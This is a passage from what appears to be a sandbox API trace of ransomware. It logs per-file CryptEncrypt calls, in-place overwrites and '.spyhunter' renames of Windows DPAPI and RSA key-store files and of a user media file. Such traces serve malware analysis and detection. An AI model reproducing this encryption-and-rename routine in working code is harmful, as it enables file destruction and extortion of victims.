lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0140.653] WriteFile (in: hFile=0xf0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x18, lpNumberOfBytesWritten=0x248f42c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248f42c*=0x18, lpOverlapped=0x0) returned 1 [0140.653] GetProcessHeap () returned 0x2c0000 [0140.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0140.653] SetFilePointerEx (in: hFile=0xf0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.653] WriteFile (in: hFile=0xf0, lpBuffer=0x248f46c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f42c, lpOverlapped=0x0 | out: lpBuffer=0x248f46c*, lpNumberOfBytesWritten=0x248f42c*=0x4, lpOverlapped=0x0) returned 1 [0140.653] WriteFile (in: hFile=0xf0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f42c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248f42c*=0x30, lpOverlapped=0x0) returned 1 [0140.653] CloseHandle (hObject=0xf0) returned 1 [0140.653] GetProcessHeap () returned 0x2c0000 [0140.653] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ff5a50 [0140.654] wnsprintfW (in: pszDest=0x2ff5a50, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\Preferred.spyhunter") returned 133 [0140.654] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\Preferred" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3111613574-2524581245-2586426736-500\\preferred"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\Preferred.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3111613574-2524581245-2586426736-500\\preferred.spyhunter")) returned 1 [0140.654] GetProcessHeap () returned 0x2c0000 [0140.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff5a50 | out: hHeap=0x2c0000) returned 1 [0140.654] GetProcessHeap () returned 0x2c0000 [0140.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0140.655] GetProcessHeap () returned 0x2c0000 [0140.655] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fbf7e0 | out: hHeap=0x2c0000) returned 1 [0140.655] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f468 | out: pbBuffer=0x248f468) returned 1 [0140.655] GetProcessHeap () returned 0x2c0000 [0140.655] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0140.655] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248f460*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248f460*=0x30) returned 1 [0140.655] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf0 [0140.655] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9") returned 150 [0140.655] StrStrW (lpFirst="be5b4fbd-cb99-45f5-9462-5f896dd3a6b9", lpSrch=".txt") returned 0x0 [0140.655] GetProcessHeap () returned 0x2c0000 [0140.656] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0140.656] ReadFile (in: hFile=0xf0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f424, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248f424*=0x1d4, lpOverlapped=0x0) returned 1 [0140.656] SetFilePointerEx (in: hFile=0xf0, liDistanceToMove=0xfffffe2c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0140.656] WriteFile (in: hFile=0xf0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x1d4, lpNumberOfBytesWritten=0x248f424, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248f424*=0x1d4, lpOverlapped=0x0) returned 1 [0140.657] GetProcessHeap () returned 0x2c0000 [0140.657] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0140.657] SetFilePointerEx (in: hFile=0xf0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.657] WriteFile (in: hFile=0xf0, lpBuffer=0x248f464*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f424, lpOverlapped=0x0 | out: lpBuffer=0x248f464*, lpNumberOfBytesWritten=0x248f424*=0x4, lpOverlapped=0x0) returned 1 [0140.657] WriteFile (in: hFile=0xf0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f424, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248f424*=0x30, lpOverlapped=0x0) returned 1 [0140.657] CloseHandle (hObject=0xf0) returned 1 [0140.657] GetProcessHeap () returned 0x2c0000 [0140.657] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ff5a50 [0140.657] wnsprintfW (in: pszDest=0x2ff5a50, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9.spyhunter") returned 160 [0140.657] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9.spyhunter")) returned 1 [0140.658] GetProcessHeap () returned 0x2c0000 [0140.658] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff5a50 | out: hHeap=0x2c0000) returned 1 [0140.658] GetProcessHeap () returned 0x2c0000 [0140.658] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0140.659] GetProcessHeap () returned 0x2c0000 [0140.659] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fe7c48 | out: hHeap=0x2c0000) returned 1 [0140.659] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f468 | out: pbBuffer=0x248f468) returned 1 [0140.659] GetProcessHeap () returned 0x2c0000 [0140.659] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0140.659] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248f460*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248f460*=0x30) returned 1 [0140.659] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0140.659] GetProcessHeap () returned 0x2c0000 [0140.660] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0140.660] GetProcessHeap () returned 0x2c0000 [0140.660] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fe8ec0 | out: hHeap=0x2c0000) returned 1 [0140.660] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f460 | out: pbBuffer=0x248f460) returned 1 [0140.660] GetProcessHeap () returned 0x2c0000 [0140.660] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0140.660] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248f458*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248f458*=0x30) returned 1 [0140.660] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3111613574-2524581245-2586426736-500\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0140.660] GetProcessHeap () returned 0x2c0000 [0140.660] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0140.660] GetProcessHeap () returned 0x2c0000 [0140.660] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fe8d88 | out: hHeap=0x2c0000) returned 1 [0140.660] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f460 | out: pbBuffer=0x248f460) returned 1 [0140.660] GetProcessHeap () returned 0x2c0000 [0140.660] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0140.660] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248f458*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248f458*=0x30) returned 1 [0140.660] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\83aa4cc77f591dfc2374580bbd95f6ba_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\crypto\\rsa\\s-1-5-21-3388679973-3930757225-3770151564-1000\\83aa4cc77f591dfc2374580bbd95f6ba_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf0 [0140.661] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\83aa4cc77f591dfc2374580bbd95f6ba_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f") returned 187 [0140.661] StrStrW (lpFirst="83aa4cc77f591dfc2374580bbd95f6ba_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpSrch=".txt") returned 0x0 [0140.661] GetProcessHeap () returned 0x2c0000 [0140.661] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0140.661] ReadFile (in: hFile=0xf0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f41c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248f41c*=0x2d, lpOverlapped=0x0) returned 1 [0140.662] SetFilePointerEx (in: hFile=0xf0, liDistanceToMove=0xffffffd3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0140.662] WriteFile (in: hFile=0xf0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2d, lpNumberOfBytesWritten=0x248f41c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248f41c*=0x2d, lpOverlapped=0x0) returned 1 [0140.662] GetProcessHeap () returned 0x2c0000 [0140.662] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0140.662] SetFilePointerEx (in: hFile=0xf0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.662] WriteFile (in: hFile=0xf0, lpBuffer=0x248f45c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f41c, lpOverlapped=0x0 | out: lpBuffer=0x248f45c*, lpNumberOfBytesWritten=0x248f41c*=0x4, lpOverlapped=0x0) returned 1 [0140.663] WriteFile (in: hFile=0xf0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f41c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248f41c*=0x30, lpOverlapped=0x0) returned 1 [0140.663] CloseHandle (hObject=0xf0) returned 1 [0140.663] GetProcessHeap () returned 0x2c0000 [0140.663] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ff5a50 [0140.663] wnsprintfW (in: pszDest=0x2ff5a50, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\83aa4cc77f591dfc2374580bbd95f6ba_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.spyhunter") returned 197 [0140.663] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\83aa4cc77f591dfc2374580bbd95f6ba_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\crypto\\rsa\\s-1-5-21-3388679973-3930757225-3770151564-1000\\83aa4cc77f591dfc2374580bbd95f6ba_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\83aa4cc77f591dfc2374580bbd95f6ba_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\crypto\\rsa\\s-1-5-21-3388679973-3930757225-3770151564-1000\\83aa4cc77f591dfc2374580bbd95f6ba_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.spyhunter")) returned 1 [0140.664] GetProcessHeap () returned 0x2c0000 [0140.664] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff5a50 | out: hHeap=0x2c0000) returned 1 [0140.664] GetProcessHeap () returned 0x2c0000 [0140.664] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0140.664] GetProcessHeap () returned 0x2c0000 [0140.664] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e17f18 | out: hHeap=0x2c0000) returned 1 [0140.664] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f458 | out: pbBuffer=0x248f458) returned 1 [0140.665] GetProcessHeap () returned 0x2c0000 [0140.665] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0140.665] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248f450*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248f450*=0x30) returned 1 [0140.665] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\crypto\\rsa"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0140.665] GetProcessHeap () returned 0x2c0000 [0140.665] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0140.665] GetProcessHeap () returned 0x2c0000 [0140.665] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fbf2c0 | out: hHeap=0x2c0000) returned 1 [0140.665] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f458 | out: pbBuffer=0x248f458) returned 1 [0140.665] GetProcessHeap () returned 0x2c0000 [0140.665] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0140.665] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248f450*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248f450*=0x30) returned 1 [0140.665] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\crypto\\rsa\\s-1-5-21-3388679973-3930757225-3770151564-1000\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0140.665] GetProcessHeap () returned 0x2c0000 [0140.665] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0140.665] GetProcessHeap () returned 0x2c0000 [0140.665] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fe8c50 | out: hHeap=0x2c0000) returned 1 [0140.665] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f450 | out: pbBuffer=0x248f450) returned 1 [0140.665] GetProcessHeap () returned 0x2c0000 [0140.666] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0140.666] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248f448*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248f448*=0x30) returned 1 [0140.666] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\crypto"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0140.666] GetProcessHeap () returned 0x2c0000 [0140.666] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0140.666] GetProcessHeap () returned 0x2c0000 [0140.666] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb5498 | out: hHeap=0x2c0000) returned 1 [0140.666] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f450 | out: pbBuffer=0x248f450) returned 1 [0140.666] GetProcessHeap () returned 0x2c0000 [0140.666] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0140.666] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248f448*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248f448*=0x30) returned 1 [0140.666] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\crypto\\rsa\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0140.666] GetProcessHeap () returned 0x2c0000 [0140.666] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0140.666] GetProcessHeap () returned 0x2c0000 [0140.666] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb53b8 | out: hHeap=0x2c0000) returned 1 [0140.666] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f448 | out: pbBuffer=0x248f448) returned 1 [0140.666] GetProcessHeap () returned 0x2c0000 [0140.667] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0140.667] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248f440*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248f440*=0x30) returned 1 [0140.667] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0140.667] GetProcessHeap () returned 0x2c0000 [0140.667] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0140.667] GetProcessHeap () returned 0x2c0000 [0140.667] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c81b28 | out: hHeap=0x2c0000) returned 1 [0140.667] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f448 | out: pbBuffer=0x248f448) returned 1 [0140.667] GetProcessHeap () returned 0x2c0000 [0140.667] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0140.667] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248f440*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248f440*=0x30) returned 1 [0140.667] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\crypto\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0140.667] GetProcessHeap () returned 0x2c0000 [0140.667] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0140.667] GetProcessHeap () returned 0x2c0000 [0140.668] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c81a50 | out: hHeap=0x2c0000) returned 1 [0140.882] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f438 | out: pbBuffer=0x248f438) returned 1 [0140.882] GetProcessHeap () returned 0x2c0000 [0140.882] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0140.882] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248f430*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248f430*=0x30) returned 1 [0140.882] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\cqLF420dbSuALDTrG.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\cqlf420dbsualdtrg.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0140.883] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\cqLF420dbSuALDTrG.mp3") returned 71 [0140.883] StrStrW (lpFirst="cqLF420dbSuALDTrG.mp3", lpSrch=".txt") returned 0x0 [0140.883] GetProcessHeap () returned 0x2c0000 [0140.883] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0140.883] ReadFile (in: hFile=0x184, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f3f4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248f3f4*=0x2800, lpOverlapped=0x0) returned 1 [0140.884] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0140.884] WriteFile (in: hFile=0x184, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248f3f4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248f3f4*=0x2800, lpOverlapped=0x0) returned 1 [0140.884] GetProcessHeap () returned 0x2c0000 [0140.884] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0140.884] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.884] WriteFile (in: hFile=0x184, lpBuffer=0x248f434*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f3f4, lpOverlapped=0x0 | out: lpBuffer=0x248f434*, lpNumberOfBytesWritten=0x248f3f4*=0x4, lpOverlapped=0x0) returned 1 [0140.884] WriteFile (in: hFile=0x184, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f3f4, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x248f3f4*=0x30, 